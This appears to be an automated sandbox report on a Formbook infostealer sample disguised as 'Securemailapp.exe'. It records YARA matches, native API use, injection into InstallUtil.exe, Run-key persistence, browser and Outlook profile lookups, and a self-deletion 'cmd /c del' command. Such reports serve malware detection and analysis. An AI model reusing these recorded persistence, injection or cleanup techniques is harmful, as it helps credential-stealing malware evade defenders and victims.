Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
.NET source code contains very large array initializationsShow sources
Source: Securemailapp.exe, wtf/gaRCmQnkObbkusNLMcWH.csLarge array initialization: ArrayBytes: array initializer size 67088
Source: 0.0.Securemailapp.exe.7f0000.0.unpack, wtf/gaRCmQnkObbkusNLMcWH.csLarge array initialization: ArrayBytes: array initializer size 67088
Contains functionality to call native functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416BE0 NtCreateFile,2_2_00416BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416C90 NtReadFile,2_2_00416C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416D10 NtClose,2_2_00416D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416DC0 NtAllocateVirtualMemory,2_2_00416DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416C8A NtReadFile,2_2_00416C8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416D0A NtClose,2_2_00416D0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416DBB NtAllocateVirtualMemory,2_2_00416DBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_0125A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_0125A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A240 NtReadFile,LdrInitializeThunk,2_2_0125A240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A2D0 NtClose,LdrInitializeThunk,2_2_0125A2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A560 NtQuerySystemInformation,LdrInitializeThunk,2_2_0125A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A540 NtDelayExecution,LdrInitializeThunk,2_2_0125A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_0125A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A410 NtQueryInformationToken,LdrInitializeThunk,2_2_0125A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_0125A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A480 NtMapViewOfSection,LdrInitializeThunk,2_2_0125A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A720 NtResumeThread,LdrInitializeThunk,2_2_0125A720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_0125A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A750 NtCreateFile,LdrInitializeThunk,2_2_0125A750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_0125A610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A6A0 NtCreateSection,LdrInitializeThunk,2_2_0125A6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A800 NtSetValueKey,2_2_0125A800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125B0B0 NtGetContextThread,2_2_0125B0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A310 NtEnumerateValueKey,2_2_0125A310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A370 NtQueryInformationProcess,2_2_0125A370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A350 NtQueryValueKey,2_2_0125A350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A3D0 NtCreateKey,2_2_0125A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A220 NtWaitForSingleObject,2_2_0125A220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125BA30 NtSetContextThread,2_2_0125BA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A260 NtWriteFile,2_2_0125A260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A2F0 NtQueryInformationFile,2_2_0125A2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A520 NtEnumerateKey,2_2_0125A520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125BD40 NtSuspendThread,2_2_0125BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A5A0 NtWriteVirtualMemory,2_2_0125A5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A430 NtQueryVirtualMemory,2_2_0125A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125B410 NtOpenProcessToken,2_2_0125B410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A460 NtOpenProcess,2_2_0125A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A470 NtSetInformationFile,2_2_0125A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125B470 NtOpenThread,2_2_0125B470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125ACE0 NtCreateMutant,2_2_0125ACE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A710 NtQuerySection,2_2_0125A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A780 NtOpenDirectoryObject,2_2_0125A780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A650 NtQueueApcThread,2_2_0125A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0125A6D0 NtCreateProcessEx,2_2_0125A6D0
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Windows\AppCompat\Programs\Amcache.hve.tmpJump to behavior
Detected potential crypto functionShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0041B0FF2_2_0041B0FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_004079102_2_00407910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00419CBA2_2_00419CBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0041A6642_2_0041A664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00419EB42_2_00419EB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012471102_2_01247110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124594B2_2_0124594B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012ED9BE2_2_012ED9BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012461802_2_01246180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E19E22_2_012E19E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D61DF2_2_012D61DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124E0202_2_0124E020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012400212_2_01240021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DD0162_2_012DD016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012410702_2_01241070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012C18B62_2_012C18B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122A0802_2_0122A080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E28E82_2_012E28E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012448CB2_2_012448CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123FB402_2_0123FB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244B962_2_01244B96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121EBE02_2_0121EBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C22_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D0A022_2_012D0A02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012EE2142_2_012EE214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244A5B2_2_01244A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012342B02_2_012342B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E1A992_2_012E1A99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E22DD2_2_012E22DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012315302_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012BC53F2_2_012BC53F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D1D1B2_2_012D1D1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E25192_2_012E2519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01210D402_2_01210D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012BE58A2_2_012BE58A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DE5812_2_012DE581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012C1DE32_2_012C1DE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CFDDB2_2_012CFDDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DD5D22_2_012DD5D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012CF42B2_2_012CF42B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0122740C2_2_0122740C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012314102_2_01231410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124547E2_2_0124547E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E1C9F2_2_012E1C9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E2C9A2_2_012E2C9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D34902_2_012D3490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D44EF2_2_012D44EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DDCC52_2_012DDCC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E17462_2_012E1746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D27822_2_012D2782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012357902_2_01235790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E1FCE2_2_012E1FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012466112_2_01246611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244E612_2_01244E61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DCE662_2_012DCE66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01245E702_2_01245E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012376402_2_01237640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3E962_2_012D3E96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E26F82_2_012E26F8
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeCode function: 16_2_007507C816_2_007507C8
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 0126DDE8 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 0121B0E0 appears 174 times
One or more processes crashShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1212
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\explorer.exeSection loaded: comsvcs.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
Yara signature matchShow sources
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/11@22/9
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeFile created: C:\Users\user\AppData\Roaming\OP92SA42Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1156:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1744
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\NoltJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: Securemailapp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\Securemailapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Nolt\chkdskuda.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Securemailapp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Securemailapp.exeVirustotal: Detection: 64%
Source: Securemailapp.exeReversingLabs: Detection: 46%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Securemailapp.exe 'C:\Users\user\Desktop\Securemailapp.exe'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 1212
Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Nolt\chkdskuda.exe C:\Program Files (x86)\Nolt\chkdskuda.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Nolt\chkdskuda.exe C:\Program Files (x86)\Nolt\chkdskuda.exeJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeFile written: C:\Users\user\AppData\Roaming\OP92SA42\OP9logri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
PE file contains a COM descriptor data directoryShow sources
Source: Securemailapp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: Securemailapp.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbolsShow sources
Source: Binary string: chkdsk.pdbGCTL source: InstallUtil.exe, 00000002.00000002.622990920.00000000007E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.596045813.00000000060D0000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: InstallUtil.exe, 00000002.00000002.622990920.00000000007E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: InstallUtil.exe, 00000002.00000002.624954570.00000000011F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: InstallUtil.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.596045813.00000000060D0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: Securemailapp.exe, wtf/FbsRkpqvExsIjWfLPC.cs.Net Code: Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Securemailapp.exe.7f0000.0.unpack, wtf/FbsRkpqvExsIjWfLPC.cs.Net Code: Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00419A55 push eax; ret 2_2_00419AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00402276 push edi; ret 2_2_0040227F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00419AA2 push eax; ret 2_2_00419AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00419AAB push eax; ret 2_2_00419B12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00416B52 push edi; iretd 2_2_00416B5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00419B0C push eax; ret 2_2_00419B12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_004146B3 push esi; iretd 2_2_004146B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00413F6E push ebp; retf 2_2_0041406D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0040DFC3 push edi; ret 2_2_0040DFC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00414FFC push ebx; ret 2_2_00415004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0126DE2D push ecx; ret 2_2_0126DE40

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JBD0UFWPRTFJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JBD0UFWPRTFJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Securemailapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
